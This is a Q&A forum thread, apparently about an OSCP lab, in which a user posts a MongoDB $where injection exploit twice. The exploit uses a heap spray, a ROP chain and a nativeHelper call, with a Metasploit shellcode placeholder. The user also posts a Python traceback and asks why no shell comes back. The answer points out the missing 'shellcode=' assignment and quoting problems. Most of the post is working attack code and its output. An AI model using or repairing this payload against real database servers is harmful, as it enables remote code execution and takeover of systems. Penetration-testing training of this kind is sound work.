1

I know I can input this into a search box that queries the MongoDB. I have updated the code with my shell code, but I won't include that, I will just use the exploit as it is here:

db.my_collection.find({'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})

When this gets entered into the DB, I get a python error, which looks like this:

 /usr/lib/cgi-bin/mongo/2.2.3/dbparse.py in () 41 print "</th>" 42 if where: => 43 for record in collection.find(where): 44 print "<tr>" 45 print "<td align=\"center\">"+record["CompanyName"]+"</td>" record undefined, collection = Collection(Database(MongoClient('localhost', 27017), u'test_database'), u'london_garages'), collection.find = <bound method Collection.find of Collection(Data...', 27017), u'test_database'), u'london_garages')>, where = {'$where': 'this.CompanyName == \'db.my_collection.find({\'$wh...x08"+"\\x20\\x20\\x20\\x20"+"\\x58\\x71\\x45\\x08"]);\'})\''} /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in next(self=<pymongo.cursor.Cursor object>) 812 raise StopIteration 813 db = self.__collection.database => 814 if len(self.__data) or self._refresh(): 815 if self.__manipulate: 816 return db._fix_outgoing(self.__data.popleft(), builtin len = <built-in function len>, self = <pymongo.cursor.Cursor object>, self.__data undefined, self._refresh = <bound method Cursor._refresh of <pymongo.cursor.Cursor object>> /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in _refresh(self=<pymongo.cursor.Cursor object>) 761 self.__skip, ntoreturn, 762 self.__query_spec(), self.__fields, => 763 self.__uuid_subtype)) 764 if not self.__id: 765 self.__killed = True self = <pymongo.cursor.Cursor object>, self.__uuid_subtype undefined /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in __send_message(self=<pymongo.cursor.Cursor object>, message=(-720441271, '\xb1\x03\x00\x00I\xf0\x0e\xd5\x00\x00\x00\x00\xd4\x07\x00\x00\x00\x00\x00\x00test_database.london_garages...8"+"\\x20\\x20\\x20\\x20"+"\\x58\\x71\\x45\\x08"]);\'})\'\x00\x00', 888)) 718 self.__as_class, 719 self.__tz_aware, => 720 self.__uuid_subtype) 721 except AutoReconnect: 722 # Don't send kill cursors to another server after a "not master" self = <pymongo.cursor.Cursor object>, self.__uuid_subtype undefined /usr/local/lib/python2.7/dist-packages/pymongo/helpers.py in _unpack_response(response="\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00.\x00\x00\x00\x02$err\x00\x15\x00\x00\x00$where compile error\x00\x10code\x00V'\x00\x00\x00", cursor_id=None, as_class=<type 'dict'>, tz_aware=False, uuid_subtype=3) 97 raise AutoReconnect(error_object["$err"]) 98 raise OperationFailure("database error: %s" % => 99 error_object["$err"]) 100 101 result = {} error_object = {u'$err': u'$where compile error', u'code': 10070}

I understand that this is an error related to the fact that the database is already performing some of the functionality in the front of my input, so I amended this to look like this:

 unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);

This doesn't return an error, but the shell isn't returned. Could I be forgetting some characters here that prevent my code from executing? Another concern I have is that the assignment to shellcode, when removed, may impact other areas of the code, for instance where shellcode is called again for testarray.

Improve this question

    1 Answer 1

    Reset to default
    2

    Looking at the error, I'm pretty sure you that this is related to one of the OSCP Lab machines. You could get more help if you post these issues on the forum, but here some tips:

    • "shellcode=" is missing on you payload
    • Check single and double quotes
    Improve this answer
    1
    • He says "I have updated the code with my shell code but I won't include that"
      – DimiDak
      CommentedMar 26, 2021 at 18:45

    You must log in to answer this question.

    Start asking to get answers

    Find the answer to your question by asking.

    Ask question

    Explore related questions

    See similar questions with these tags.